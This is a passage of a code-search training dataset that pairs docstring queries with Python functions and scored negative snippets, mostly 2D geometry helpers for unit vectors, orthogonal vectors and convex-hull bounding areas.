level='INFO')\n return _snap_exec(['refresh'] + flags + packages)", "def reload():\n if not _status_apf():\n return __apf_cmd(\"-r\")", "def update_go_deps(self):\n self.go_version()\n env = self.m.step.get_from_context('env', {})\n env.update(self.go_env)\n with self.m.step.context({'env': env}):\n self.m.run.with_retry(\n self.m.step,\n 'update go pkgs',\n UPDATE_GO_ATTEMPTS,\n cmd=[self.go_exe, 'get', '-u', '-t', '%s/...' % INFRA_GO_PKG])", "async def reload_platform(self) -> None:", "def update(self, paths):\n raise NotImplementedError", "def update(appname, use_appimageupdate=True):\n z = Zap(appname)\n z.update(use_appimageupdate=use_appimageupdate)", "def exchange_solution(self):\n for ss in self.solvers:\n ss.register_solution()\n\n if self.has_amr:\n self.tioga.data_update_amr()\n else:\n raise NotImplementedError(\"Invalid overset exchange\")\n\n for ss in self.solvers:\n ss.update_solution()", "def update():\n require('PROJECT_NAME')\n\n with cd(utils.home('apps', env.PROJECT_NAME)):\n run('hg pull')\n run('hg up')", "def update(self):\n with settings(user=self.serviceUser):\n self.venv.create()\n\n self.venv.install_twisted()\n self.venv.install(\" \".join(\"\"\"\n psycopg2==2.7.5\n pygments==2.2.0\n spambayes==1.1b3\n trac==1.2.2\n trac-github==2.3\n requests_oauthlib==1.0.0\n svn+https://svn.edgewall.org/repos/trac/plugins/1.2/spam-filter@15310\n git+https://github.com/twisted-infra/twisted-trac-plugins.git\n \"\"\".split()))\n\n # This is txacme v2 but is not yet released.\n # Should be replaced on we have txacme v2.\n # See https://github.com/twisted/txacme/pull/158\n self.venv.install(\n \"--index=https://pypi.chevah.com/simple txacme==1.0.0.chevah4\")\n\n run('mkdir -p ' + self.configDir)\n put(os.path.dirname(__file__) + '/*', self.configDir,\n mirror_local_mode=True)", "def refresh_well_registry_mv(connect):\n cursor = connect.cursor()\n cursor.execute(\"begin dbms_mview.refresh('GW_DATA_PORTAL.WELL_REGISTRY_MV'); end;\")" ]
[ "0.5909581", "0.52897483", "0.5182346", "0.5049008", "0.50418323", "0.487255", "0.48481926", "0.48071972", "0.48067838", "0.48017973", "0.47946712", "0.47891673", "0.4787338", "0.47767738", "0.47652295", "0.47616255", "0.47590637", "0.47561038", "0.47273707", "0.47131407", "0.4707602", "0.4694417", "0.4686729", "0.46768755", "0.46719193", "0.4668742", "0.4649456", "0.46476108", "0.4646367", "0.4643261" ]
0.63963205
0
Given two points pt0 and pt1, return a unit vector that points in the direction of pt0 to pt1. Returns
def _unit_vector(pt0, pt1): dis_0_to_1 = sqrt((pt0[0] - pt1[0])**2 + (pt0[1] - pt1[1])**2) return (pt1[0] - pt0[0]) / dis_0_to_1, \ (pt1[1] - pt0[1]) / dis_0_to_1
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def dir_vector(p1: Vec2, p2: Vec2) -> Vec2:\n return Vec2(p2.x - p1.x, p2.y - p1.y)", "def vector(p0, p1):\n a = p1[0] - p0[0]\n b = p1[1] - p0[1]\n return (a, b)", "def direction(point0, point1):\n d = [0, 0, 0]\n vector = [point1[0] - point0[0], point1[1] - point0[1]]\n d[1] = math.atan2(vector[1], vector[0])\n while d[1] <= -np.pi / 2:\n d[1] += np.pi\n return d", "def from_pts(one, two):\n\t\treturn Vec2(two[0] - one[0], two[1] - one[1])", "def dirVector(self,p1,p2):\n v=p2-p1\n l=v.Length\n return self.toMatrix(v)/l", "def point_to_point(p1: Vec2, p2: Vec2):\n return length(dir_vector(p1, p2))", "def point_to_point_vector(point0, point1, out=None):\n point0 = np.reshape(point0, (2, -1))\n point1 = np.reshape(point1, (2, -1))\n\n if out is None:\n return np.subtract(point1, point0)\n else:\n return np.subtract(point1, point0, out=out)", "def create_vector(point_1, point_2):\n return tuple([point_2[0] - point_1[0], point_2[1] - point_1[1]])", "def nor_vector(p1: Vec2, p2: Vec2) -> Vec2:\n return Vec2(p1.y - p2.y, p2.x - p1.x)", "def qpDist(pt0, pt1):\n a = hou.Vector2(pt0.x(), pt0.y())\n b = hou.Vector2(pt1.x(), pt1.y())\n return a.distanceTo(b)", "def get_direction(pt1, pt2):\n dx, dy = pt2[0]-pt1[0], pt2[1]-pt1[1]\n if abs(dx)<=TOL and dy>0:\n return \"NORTH\"\n elif abs(dy)<=TOL and dx<0:\n return \"WEST\"\n elif abs(dx)<=TOL and dy<0:\n return \"SOUTH\"\n else:\n return \"EAST\"", "def getVec(pos1, pos2):\n\n x1 = pos2[0] - pos1[0]\n y1 = pos2[1] - pos1[1]\n gcd1 = math.gcd(abs(x1), abs(y1))\n\n if gcd1 > 0:\n x = x1//gcd1\n else:\n x = x1\n if gcd1 > 0:\n y = y1//gcd1\n else:\n y = y1\n\n return x, y", "def dist(pt1, pt2):\n return np.sqrt((pt2[0]-pt1[0])**2 + (pt2[1]-pt1[1])**2)", "def find_perpendicular_vector(vt):\n x, y = vt\n return np.array([y, -x])", "def vector_between_points(a, b):\n vector_1 = Vector(*a)\n vector_2 = Vector(*b)\n return vector_1 - vector_2", "def translation_separation(t1: np.ndarray, t2: np.ndarray) -> float:\n return np.linalg.norm(t1 - t2)", "def point_to_line_signed(p: Vec2, p0: Vec2, p1: Vec2):\n return cross(norm(nor_vector(p0, p1)), dir_vector(p, p0))", "def distance(pt1, pt2):\n return (pt1[0] - pt2[0]) ** 2 + (pt1[1] - pt2[1]) ** 2", "def _relative_velocity(vel1, vel2):\n return [ v1 - v2 for (v1, v2) in zip(vel1, vel2)]", "def pt_dist(p1, p2):\n return math.sqrt(abs((p1[0] - p2[0])**2) + abs((p1[1] - p2[1])**2))", "def TwoPoints(self, p1, p2):\n\n p1 = base.getvector(p1)\n if len(p1) == 2:\n p1 = np.r_[p1, 1]\n p2 = base.getvector(p2)\n if len(p2) == 2:\n p2 = np.r_[p2, 1]\n\n return Line2(np.cross(p1, p2))", "def get_exact_angle(pt1, pt2):\n dx, dy = pt2[0]-pt1[0], pt2[1]-pt1[1]\n return math.atan2(dy,dx)", "def find_direction_vector(line):\n pt1, pt2 = line\n pt1 = np.array(pt1).reshape(2,)\n pt2 = np.array(pt2).reshape(2,)\n direct = pt2 - pt1\n direct_norm = normalize(direct)\n return direct_norm", "def _mid(pt1, pt2):\n (x0, y0), (x1, y1) = pt1, pt2\n return 0.5 * (x0 + x1), 0.5 * (y0 + y1)", "def getVector(c1, c2):\n return [c1[0] - c2[0], c1[1] - c2[1], c1[2] - c2[2]]", "def normal(point_one, point_two):\n return numpy.array([point_one[1] - point_two[1], point_two[0] - point_one[0]])", "def d2(x0,y0,x1,y1):\n return (x0-x1)*(x0-x1) + (y0-y1)*(y0-y1)", "def dist(pnt1, pnt2):\n return ((pnt2[0] - pnt1[0])**2 + (pnt2[1] - pnt1[1])**2 + (pnt2[2] - pnt1[2])**2)**0.5", "def get_distance(pt1,pt2):\r\n x1 = pt1[1]\r\n y1 = pt1[0]\r\n x2 = pt2[1]\r\n y2 = pt2[0]\r\n d = np.sqrt((x2-x1)**2 + (y2-y1)**2)\r\n return d", "def normal(point0: Point, point1: Point) -> Tuple[Point, float]:\n mid: Point = ((point0[0] + point1[0]) / 2, (point0[1] + point1[1]) / 2)\n v: Vector2 = (point1[0] - point0[0], point1[1] - point0[1])\n normal: Vector2 = (-v[1], v[0])\n\n angle = math.atan(v[1] / v[0])\n angleNorm = math.atan(normal[1] / normal[0])\n assert(abs(abs(angle - angleNorm) - math.pi / 2) < 0.001)\n\n x = [mid[0], mid[0] + normal[0]]\n y = [mid[1], mid[1] + normal[1]]\n plt.plot(x, y, \":\")\n\n return (mid, angleNorm)" ]
[ "0.7350742", "0.7088152", "0.7051899", "0.6943673", "0.68375623", "0.6814168", "0.6791304", "0.6746292", "0.6693085", "0.64756083", "0.64739174", "0.64329237", "0.6425584", "0.6419102", "0.6410274", "0.6389862", "0.63404804", "0.6337205", "0.6286878", "0.6248634", "0.6230512", "0.6224488", "0.62206066", "0.6219337", "0.61864257", "0.6184325", "0.6151214", "0.61508095", "0.6140133", "0.6133391" ]
0.8154963
0
Given a vector, returns a orthogonal/perpendicular vector of equal length. Returns
def _orthogonal_vector(vector): return -1 * vector[1], vector[0]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_perpendicular2d(vector):\n if vector[1] == 0:\n return np.asarray([0.,1.])\n v2_0 = 1.0\n v2_1 = -(vector[0]/vector[1])\n v2 = np.asarray([v2_0, v2_1])\n return v2 / np.linalg.norm(v2)", "def perpendicular_vector(v):\n if v[1] == 0 and v[2] == 0:\n if v[0] == 0:\n raise ValueError(\"zero vector\")\n else:\n return np.cross(v, [0, 1, 0])\n return np.cross(v, [1, 0, 0])", "def perpendicular_axis(vec):\n axis = vec.rotate(-math.pi / 2) # rotate vector -90 degrees\n axis = axis.norm() # turn axis vector into unit vector\n return axis", "def perpendicularTo(self, vector):\n perpendicular = self.subtractVector(self.parallelTo(vector))\n return perpendicular", "def orthogonal_to(vector: ModelParameters) -> ModelParameters:\n new_vector = rand_u_like(vector)\n new_vector = new_vector - new_vector.dot(vector) * vector / math.pow(vector.model_norm(2), 2)\n return new_vector", "def orthogonal(v):\n return np.array([-v[1], v[0]])", "def vector_perp(v):\n assert len(v) == 2\n x, y = v\n return Vector(-y, x)", "def get_orthogonal_vec2d(vec):\n ortho = np.array([-vec[1], vec[0]])\n return ortho", "def find_perpendicular_vector(vt):\n x, y = vt\n return np.array([y, -x])", "def test_perpendicular_to_vector():\n assert_almost_equal(pr.angle_between_vectors(\n pr.unitx, pr.perpendicular_to_vector(pr.unitx)), np.pi / 2.0)\n assert_almost_equal(pr.angle_between_vectors(\n pr.unity, pr.perpendicular_to_vector(pr.unity)), np.pi / 2.0)\n assert_almost_equal(pr.angle_between_vectors(\n pr.unitz, pr.perpendicular_to_vector(pr.unitz)), np.pi / 2.0)\n random_state = np.random.RandomState(0)\n for _ in range(5):\n a = pr.norm_vector(pr.random_vector(random_state))\n assert_almost_equal(pr.angle_between_vectors(\n a, pr.perpendicular_to_vector(a)), np.pi / 2.0)\n b = a - np.array([a[0], 0.0, 0.0])\n assert_almost_equal(pr.angle_between_vectors(\n b, pr.perpendicular_to_vector(b)), np.pi / 2.0)\n c = a - np.array([0.0, a[1], 0.0])\n assert_almost_equal(pr.angle_between_vectors(\n c, pr.perpendicular_to_vector(c)), np.pi / 2.0)\n d = a - np.array([0.0, 0.0, a[2]])\n assert_almost_equal(pr.angle_between_vectors(\n d, pr.perpendicular_to_vector(d)), np.pi / 2.0)", "def unit_vector(vector):\n return vector / np.linalg.norm(vector)", "def unit_vector(vector):\n return vector / np.linalg.norm(vector)", "def unit_vector(vector):\n return vector / np.linalg.norm(vector)", "def unit_vector(vector):\n return vector / np.linalg.norm(vector)", "def unit_vector(vector):\n return vector / np.linalg.norm(vector)", "def unit_vector(vector):\n return vector / np.linalg.norm(vector)", "def unit_vector(vector):\n return vector / np.linalg.norm(vector)", "def unit_vector(vector):\n return vector / np.linalg.norm(vector)", "def unit_vector(vector):\n return vector / np.linalg.norm(vector)", "def unit_vector(vector):\n return vector / np.linalg.norm(vector)", "def unit_vector(vector):\n return vector / np.linalg.norm(vector)", "def unit_vector(vector):\r\n return vector / np.linalg.norm(vector)", "def unit_vector(vector):\r\n return vector / np.linalg.norm(vector)", "def unit_vector(vector):\r\n return vector / np.linalg.norm(vector)", "def unit_vector(vector):\n return vector / np.linalg.norm(vector)", "def unit_vector(vector):\n assert(vector != [0,0])\n return vector / np.linalg.norm(vector)", "def getOnePerpendicularVector(self):\n vector_y = Vector(0, 1, 0)\n vector_z = Vector(0, 0, 1)\n\n if self.getNormalizedVector() == vector_z:\n return vector_y\n\n vector_perpendicular = vector_z.perpendicularTo(self)\n vector_perpendicular = vector_perpendicular.getNormalizedVector()\n\n return vector_perpendicular", "def unit_vector(self, vector):\n return vector / np.linalg.norm(vector)", "def perpendicular(self):\n return tuple.__new__(Vec2, (-self[1], self[0]))", "def get_unit_vector(self, vector):\n return vector / la.norm(vector)" ]
[ "0.8108887", "0.8046012", "0.80115205", "0.8010986", "0.79765224", "0.77215797", "0.75200254", "0.73142374", "0.7283013", "0.7026917", "0.6834823", "0.6834823", "0.6834823", "0.6834823", "0.6834823", "0.6834823", "0.6834823", "0.6834823", "0.6834823", "0.6834823", "0.6834823", "0.68313277", "0.68313277", "0.68313277", "0.68290037", "0.68119675", "0.67980814", "0.6733019", "0.6714627", "0.66902834" ]
0.8325588
0
Given index location in an array and convex hull, it gets two points hull[index] and hull[index+1]. From these two points, it returns a named tuple that mainly contains area of the box that bounds the hull. This bounding box orintation is same as the orientation of the lines formed by the point hull[index] and hull[index+1]. Returns
def _bounding_area(index, hull): unit_vector_p = _unit_vector(hull[index], hull[index + 1]) unit_vector_o = _orthogonal_vector(unit_vector_p) dis_p = tuple(np.dot(unit_vector_p, pt) for pt in hull) dis_o = tuple(np.dot(unit_vector_o, pt) for pt in hull) min_p = min(dis_p) min_o = min(dis_o) len_p = max(dis_p) - min_p len_o = max(dis_o) - min_o return {'area': len_p * len_o, 'length_parallel': len_p, 'length_orthogonal': len_o, 'rectangle_center': (min_p + len_p / 2, min_o + len_o / 2), 'unit_vector': unit_vector_p, }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def minimum_area_OBB(xy):\n # get convex hull\n hull = quickhull2d(xy)\n nh = len(hull)\n\n # handle special cases\n if nh < 1:\n return (numpy.zeros(2), numpy.zeros(2), numpy.eye(2))\n elif nh == 1:\n return (xy[hull[0]], numpy.zeros(2), numpy.eye(2))\n elif nh == 2:\n center = 0.5*numpy.sum(xy[hull], axis=0)\n vec = xy[hull[1]] - xy[hull[0]]\n ranges = numpy.array([\n 0.5*numpy.hypot(vec[0], vec[1]),\n 0\n ])\n axes = rotation_matrix2d(-numpy.arctan2(vec[1], vec[0]))\n return (center, ranges, axes)\n\n xyh = xy[hull]\n area = 1e20\n for i in range(nh):\n # i-th edge of the convex hull\n vec = xyh[(i+1)%nh] - xyh[i]\n\n # apply rotation that makes that edge parallel to the x-axis\n rot = rotation_matrix2d(numpy.arctan2(vec[1], vec[0]))\n xyrot = matmul(rot, xyh.T).T\n\n # xy ranges of the rotated convex hull\n mn = numpy.amin(xyrot, axis=0)\n mx = numpy.amax(xyrot, axis=0)\n ranges_tmp = mx - mn\n area_tmp = ranges_tmp[0]*ranges_tmp[1]\n \n if area_tmp < area:\n area = area_tmp\n # inverse rotation\n rot = rot.T\n center = matvecprod(rot, 0.5*(mn + mx))\n if ranges_tmp[1] > ranges_tmp[0]:\n ranges = 0.5*ranges_tmp[[1,0]]\n axes = numpy.zeros((2,2))\n axes[:,0] = rot[:,1]\n axes[:,1] = -rot[:,0]\n else:\n ranges = 0.5*ranges_tmp\n axes = rot\n return (center, ranges, axes)", "def test_convexHullFacetArea(self):\n try:\n import pyhull\n except ImportError:\n self.skipTest(\"Pyhull (optional) is not available so cannot compute facet area.\")\n \n # make points\n N = 8\n pts = [0, 0, 0,\n 3, 0, 0,\n 0, 3, 0,\n 0, 0, 3,\n 3, 3, 0,\n 0, 3, 3,\n 3, 0, 3,\n 3, 3, 3]\n \n # calc volume\n volume, facetArea = clusters.findConvexHullVolume(N, pts)\n \n self.assertAlmostEqual(facetArea, 54.0)", "def get_area_box(contours_points):\n rect = cv2.minAreaRect(np.array(contours_points))\n box = cv2.cv.BoxPoints(rect)\n box = np.array(box)\n return map(tuple, box)", "def area(boxes):\n y_min, x_min, y_max, x_max = np.split(boxes, 4, axis=-1)\n return np.squeeze((y_max - y_min) * (x_max - x_min), [1])", "def get_face_areas(self, idx=-1):\n if idx >= len(self.faces):\n raise IndexError\n if idx >= 0:\n v1, v2, v3 = self.faces[idx]\n v1, v2, v3 = self.vertices[v1], self.vertices[v2], self.vertices[v3]\n a = np.linalg.norm(v1 - v2)\n b = np.linalg.norm(v1 - v3)\n c = np.linalg.norm(v2 - v3)\n s = (a + b + c) / 2\n area = np.sqrt(s * (s - a) * (s - b) * (s - c))\n return area\n else:\n v1, v2, v3 = self.faces[:, 0], self.faces[:, 1], self.faces[:, 2]\n v1, v2, v3 = self.vertices[v1], self.vertices[v2], self.vertices[v3]\n a = np.linalg.norm(v1 - v2, axis=1)\n b = np.linalg.norm(v1 - v3, axis=1)\n c = np.linalg.norm(v2 - v3, axis=1)\n s = (a + b + c) / 2\n area = np.sqrt(s * (s - a) * (s - b) * (s - c))\n return area", "def boundingBoxArea(box):\n return (box[2] - box[0] + 1) * (box[3] - box[1] + 1)", "def area(boxes):\n return (boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1])", "def get_bounding_box(self):\n if len(self.polygons) == 0:\n return None\n return numpy.array(((min(pts[:, 0].min() for pts in self.polygons),\n min(pts[:, 1].min() for pts in self.polygons)),\n (max(pts[:, 0].max() for pts in self.polygons),\n max(pts[:, 1].max() for pts in self.polygons))))", "def polygon_area(ppath): # pragma: no cover\n v_ = ppath.vertices\n if len(v_) < 3:\n return 0.0\n x_ = v_[:, 1] - v_[:, 1].mean()\n y_ = v_[:, 0] - v_[:, 0].mean()\n correction = x_[-1] * y_[0] - y_[-1] * x_[0]\n main_area = np.dot(x_[:-1], y_[1:]) - np.dot(y_[:-1], x_[1:])\n return 0.5 * np.abs(main_area + correction)", "def area(boxes):\n return (boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1])", "def boundingBox(self):\n y_max = np.max(self.points[:,0])\n x_max = np.max(self.points[:,1])\n y_min = np.min(self.points[:,0])\n x_min = np.min(self.points[:,1])\n \n return ((x_max, y_max), (x_min, y_min))", "def polygon_area(x, y):\n return 0.5 * np.abs(np.dot(x, np.roll(y, 1)) - np.dot(y, np.roll(x, 1)))", "def _get_area_polygon(points_x, points_z):\n area = 0\n j = len(points_x) - 1\n for i in range(len(points_x)):\n area = area + (\n points_x[j] + points_x[i]\n ) * (points_z[j] - points_z[i])\n j = i\n return np.abs(area / 2)", "def calcFaceAreas(x,y,z):\n (nLonP1, nLatP1) = x.shape\n (nLon, nLat) = (nLonP1-1, nLatP1-1)\n\n area = numpy.zeros((nLon, nLat))\n\n for i in range(nLon):\n for j in range(nLat):\n left = distance( (x[i,j], y[i,j], z[i,j]), (x[i,j+1], y[i,j+1], z[i,j+1]) )\n right = distance( (x[i+1,j], y[i+1,j], z[i+1,j]), (x[i+1,j+1], y[i+1,j+1], z[i+1,j+1]) )\n top = distance( (x[i,j+1], y[i,j+1], z[i,j+1]), (x[i+1,j+1], y[i+1,j+1], z[i+1,j+1]) )\n bot = distance( (x[i,j], y[i,j], z[i,j]), (x[i+1,j], y[i+1,j], z[i+1,j]) )\n \n area[i,j] = 0.5*(left+right) * 0.5*(top+bot)\n\n return area", "def _area(bounds):\n return (bounds[0, 1] - bounds[0, 0]) * (bounds[1, 1] - bounds[1, 0])", "def convex_hull_area( contours, debug= False ):\r\n ret_areas = []\r\n ret_hulls = []\r\n for c in contours:\r\n hull = cv2.convexHull( c )\r\n area = cv2.contourArea( hull )\r\n ret_areas.append( area )\r\n ret_hulls.append( hull )\r\n if( debug ):\r\n print( \"Hull area: {0}\".format( area ) )\r\n\r\n return ( ret_areas, ret_hulls )", "def convex_hull(points):\n\n # Sort the points lexicographically (tuples are compared lexicographically).\n # Remove duplicates to detect the case we have just one unique point.\n points = sorted(set(points))\n\n # Boring case: no points or a single point, possibly repeated multiple times.\n if len(points) <= 1:\n return points\n\n # 2D cross product of OA and OB vectors, i.e. z-component of their 3D cross product.\n # Returns a positive value, if OAB makes a counter-clockwise turn,\n # negative for clockwise turn, and zero if the points are collinear.\n def cross(o, a, b):\n return (a[0] - o[0]) * (b[1] - o[1]) - (a[1] - o[1]) * (b[0] - o[0])\n\n # Build lower hull \n lower = []\n for p in points:\n while len(lower) >= 2 and cross(lower[-2], lower[-1], p) <= 0:\n lower.pop()\n lower.append(p)\n\n # Build upper hull\n upper = []\n for p in reversed(points):\n while len(upper) >= 2 and cross(upper[-2], upper[-1], p) <= 0:\n upper.pop()\n upper.append(p)\n\n # Concatenation of the lower and upper hulls gives the convex hull.\n # Last point of each list is omitted because it is repeated at the beginning of the other list. \n return lower[:-1] + upper[:-1]", "def get_referenced_floor_area() -> np.ndarray:\n\n return envelope.get_referenced_floor_area()", "def box_area(boxes):\n return (boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1])", "def box_area(boxes):\n return (boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1])", "def convex_hull(points):\n\n # Sort the points lexicographically (tuples are compared lexicographically).\n # Remove duplicates to detect the case we have just one unique point.\n points = sorted(set(points))\n\n # Boring case: no points or a single point, possibly repeated multiple times.\n if len(points) <= 1:\n return points\n\n # 2D cross product of OA and OB vectors, i.e. z-component of their 3D cross\n # product. Returns a positive value, if OAB makes a counter-clockwise turn,\n # negative for clockwise turn, and zero if the points are collinear.\n def cross(o, a, b):\n return (a[0] - o[0]) * (b[1] - o[1]) - (a[1] - o[1]) * (b[0] - o[0])\n\n # Build lower hull\n lower = []\n for p in points:\n while len(lower) >= 2 and cross(lower[-2], lower[-1], p) <= 0:\n lower.pop()\n lower.append(p)\n\n # Build upper hull\n upper = []\n for p in reversed(points):\n while len(upper) >= 2 and cross(upper[-2], upper[-1], p) <= 0:\n upper.pop()\n upper.append(p)\n\n return lower, upper", "def extract_area(data,box):\n if box is None or box[0] is None or box[1] is None or box[1][0] - box[0][0] == 0 or box[1][1] - box[0][1] == 0:\n box = ((0,0),(10,10));\n area = ut.extract_area(data['frame'],*box,data['uc'],256);\n return area;", "def sort_hull(hull):\n max_unproc_edge = hull[np.lexsort((-hull.length, hull.is_processed))][0]\n idx = np.where(hull == max_unproc_edge)[0][0]\n\n # shift convex hull to have the longest edge at the beginning\n hull = np.roll(hull, -idx, axis=0)\n\n return hull, max_unproc_edge.length", "def bounding_box(alpha):\n assert alpha.ndim == 2\n\n # Take the bounding box of the support, with a certain threshold.\n #print(\"Using alpha\", self.use_alpha, \"support\", self.support)\n supp_axs = [alpha.max(axis=1-i) for i in range(2)]\n\n th = 0.5 \n # Check first and last value of that threshold\n bb = [np.where(supp_axs[i] > th)[0][[0,-1]] for i in range(2)]\n\n # This bb looks like [(x0, x1), (y0, y1)], when we want it as (x0, y0, x1, y1)\n #psize = self.settings['subsample_size']\n #ret = (bb[0][0]/psize[0], bb[1][0]/psize[1], bb[0][1]/psize[0], bb[1][1]/psize[1])\n\n return (bb[0][0], bb[1][0], bb[0][1], bb[1][1])", "def convex_hull(points):\n\n # Sort the points lexicographically (tuples are compared lexicographically).\n # Remove duplicates to detect the case we have just one unique point.\n points = sorted(set(points))\n\n # Boring case: no points or a single point, possibly repeated multiple times.\n if len(points) <= 1:\n return points\n\n # 2D cross product of OA and OB vectors, i.e. z-component of their 3D cross product.\n # Returns a positive value, if OAB makes a counter-clockwise turn,\n # negative for clockwise turn, and zero if the points are collinear.\n def cross(o, a, b):\n return (a[0] - o[0]) * (b[1] - o[1]) - (a[1] - o[1]) * (b[0] - o[0])\n\n # Build lower hull\n lower = []\n for p in points:\n cont = 1\n while len(lower) >= 2 and cross(lower[-2], lower[-1], p) <= 0:\n print(\"antes \"), print(cont), print(lower)\n lower.pop()\n print(\"despues \"),print(lower)\n cont += 1\n lower.append(p)\n xlower ,ylower = getlists(lower)\n plt.plot(xlower,ylower,color=\"yellow\")\n # Build upper hull\n upper = []\n for p in reversed(points):\n while len(upper) >= 2 and cross(upper[-2], upper[-1], p) <= 0:\n upper.pop()\n upper.append(p)\n print(upper)\n print(\"hello2 \")\n print(cross((2,0),(2,4),(2.5,3)))\n\n xupper ,yupper = getlists(upper)\n plt.plot(xupper,yupper,color=\"blue\")\n\n\n return lower[:-1] + upper[:-1]", "def area(self):\n if len(self.exterior) < 3:\n raise Exception(\"Cannot compute the polygon's area because it contains less than three points.\")\n poly = self.to_shapely_polygon()\n return poly.area", "def _convex_hull(points):\n\n # Sort the points lexicographically (tuples are compared lexicographically).\n # Remove duplicates to detect the case we have just one unique point.\n points = sorted(set(points))\n\n # Boring case: no points or a single point, possibly repeated multiple times.\n if len(points) <= 1:\n return points\n\n # 2D cross product of OA and OB vectors, i.e. z-component of their 3D cross product.\n # Returns a positive value, if OAB makes a counter-clockwise turn,\n # negative for clockwise turn, and zero if the points are collinear.\n def cross(o, a, b):\n return (a[0] - o[0]) * (b[1] - o[1]) - (a[1] - o[1]) * (b[0] - o[0])\n\n # Build lower hull\n lower = []\n for p in points:\n while len(lower) >= 2 and cross(lower[-2], lower[-1], p) <= 0:\n lower.pop()\n lower.append(p)\n\n # Build upper hull\n upper = []\n for p in reversed(points):\n while len(upper) >= 2 and cross(upper[-2], upper[-1], p) <= 0:\n upper.pop()\n upper.append(p)\n\n # Concatenation of the lower and upper hulls gives the convex hull.\n # Last point of each list is omitted because it is repeated at the beginning of the other list.\n return lower[:-1] + upper[:-1]", "def shape_from_bounding_box(bounding_box):\n size = []\n for axs in bounding_box:\n delta = axs[1] - axs[0]\n size.append(int(delta + 0.5))\n return tuple(reversed(size))", "def polygon_area_2d(polygon):\r\n return geometry.gmPolygonArea(polygon)", "def computePointSectionArea(self,wingIndex,segmentIndex,eta,xsi):\n # tigl.wingGetUpperPoint(wingIndex, segmentIndex, eta -> y, xsi->x)\n # WARNING there is a slight difference in the area computed with this\n # method ans CPACSCREATOR. At the moment it is undetermined who is more\n # accurate.\n N = 20\n xsi1 = np.linspace(0,1,N)\n upper = np.empty((N,3))\n lower = np.empty((N,3))\n\n\n # t = np.max(np.abs(upper[:][2] - lower[:][2]))\n \n for i in range(N):\n U = self.tigl.wingGetUpperPoint(wingIndex,segmentIndex,eta,xsi1[i])\n L = self.tigl.wingGetLowerPoint(wingIndex,segmentIndex,eta,xsi1[i])\n upper[i] = np.array(U)\n lower[i] = np.array(L)\n v1 = upper[0]-upper[-1]\n v2 = upper[7] - lower[7]\n c = np.abs(upper[0][0] - upper[-1][0])\n t = np.max(np.abs(upper[:][2] - lower[:][2]))\n print(c)\n area = c*0.1*t\n # sys.exit()\n # v1xv2 = np.cross(v1,v2)\n # upper = np.flip(upper,axis=0)\n # wingSectionPoints = np.concatenate((upper, lower))\n # ey_0 = np.array([0,1,0])\n # e_1 = v1xv2\n # # Computes the cross prodct\n # cross = np.cross(ey_0,e_1)\n # normCross = np.linalg.norm(cross)\n # cross = cross/normCross\n # if normCross < 1e-8:\n # # No need to rotate\n # wingSectionPoints = np.delete(wingSectionPoints,1,1)\n # hull = ConvexHull(wingSectionPoints)\n # area = hull.volume\n # else:\n # ab = inner1d(ey_0,e_1)\n # a = np.linalg.norm(ey_0)\n # b = np.linalg.norm(e_1)\n # angle = np.arccos(ab / (a*b))\n # logger.debug(\"angle: \"+str(angle))\n # quat = angle*cross\n # r = R.from_rotvec(quat)\n # # Deletes the y column since the Convex hull will struggle with\n # # a 3d plane otherwise\n # wingSectionPoints = r.apply(wingSectionPoints)\n # wingSectionPoints = np.delete(wingSectionPoints,1,1)\n # hull = ConvexHull(wingSectionPoints)\n # # WARNING since we have built a 2D surface, the function is set up\n # # in a way that this is correct!\n # area = hull.volume\n\n logger.debug(\"Computed section area: \"+str(area))\n\n return area" ]
[ "0.71409", "0.64706504", "0.6422543", "0.6240047", "0.62209463", "0.619702", "0.60763705", "0.60492533", "0.6021375", "0.60020083", "0.59830874", "0.5958246", "0.595116", "0.59336185", "0.5892794", "0.58926195", "0.5882427", "0.58573145", "0.58370155", "0.58370155", "0.5837001", "0.57985526", "0.57971835", "0.5789974", "0.57884276", "0.577767", "0.57665795", "0.5747592", "0.57388616", "0.5737256" ]
0.79123634
0
Given angle from horizontal axis and a point from origin, returns converted unit vector coordinates in x, y coordinates. angle of unit vector should be in radians. Returns
def _to_xy_coordinates(unit_vector_angle, point): angle_orthogonal = unit_vector_angle + pi / 2 return point[0] * cos(unit_vector_angle) + point[1] * cos(angle_orthogonal), \ point[0] * sin(unit_vector_angle) + point[1] * sin(angle_orthogonal)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def vector_to_axis(line, point):\n line = line.normalized()\n np = point.norm()\n angle = line.angle(point)\n return point - line ** (np * numpy.cos(angle))", "def vector_from_angle(angle: float, magnitude: float = 1) -> typing.Tuple[float, float]:\n x = math.cos(angle) * magnitude\n y = math.sin(angle) * magnitude\n return x, y", "def getVectorWithAngle(self, angle):\n vector_perpendicular = self.getOnePerpendicularVector()\n vector_with_angle = self.rotateAroundAxis(vector_perpendicular,\n angle)\n\n return vector_with_angle", "def angleToVector(teta):\r\n x=1 #we fix x and we will determine z in consquence\r\n #we want z/x=tan(teta) so:\r\n z=np.tan(teta)*x\r\n return((x,z))", "def rotate_a(origin, point, angle):\n ox, oy = origin\n px, py = point\n\n qx = ox + math.cos(angle) * (px - ox) - math.sin(angle) * (py - oy)\n qy = oy + math.sin(angle) * (px - ox) + math.cos(angle) * (py - oy)\n return qx, qy", "def two_d_horizontal_angle(lower_point, upper_point):\n\n \"\"\"finds angle from the horizontal. It is good for scenarios such as jacking coeff and anti squat\"\"\"\n vect = np.subtract(upper_point, lower_point)\n np.ndarray.tolist(vect)\n # project to front view by deleting x term\n # vertical vect\n horiz_vect = [1, 0]\n\n # using this relation http://www.wikihow.com/Find-the-Angle-Between-Two-Vectors\n angle = np.arccos(np.divide(np.dot(vect, horiz_vect), (magnitude(lower_point, upper_point)))) * 180 / math.pi\n return angle", "def perpendicular_axis(vec):\n axis = vec.rotate(-math.pi / 2) # rotate vector -90 degrees\n axis = axis.norm() # turn axis vector into unit vector\n return axis", "def _rotate_point(origin, point, angle):\n\n ox, oy = origin\n px, py = point\n\n qx = ox + math.cos(angle) * (px - 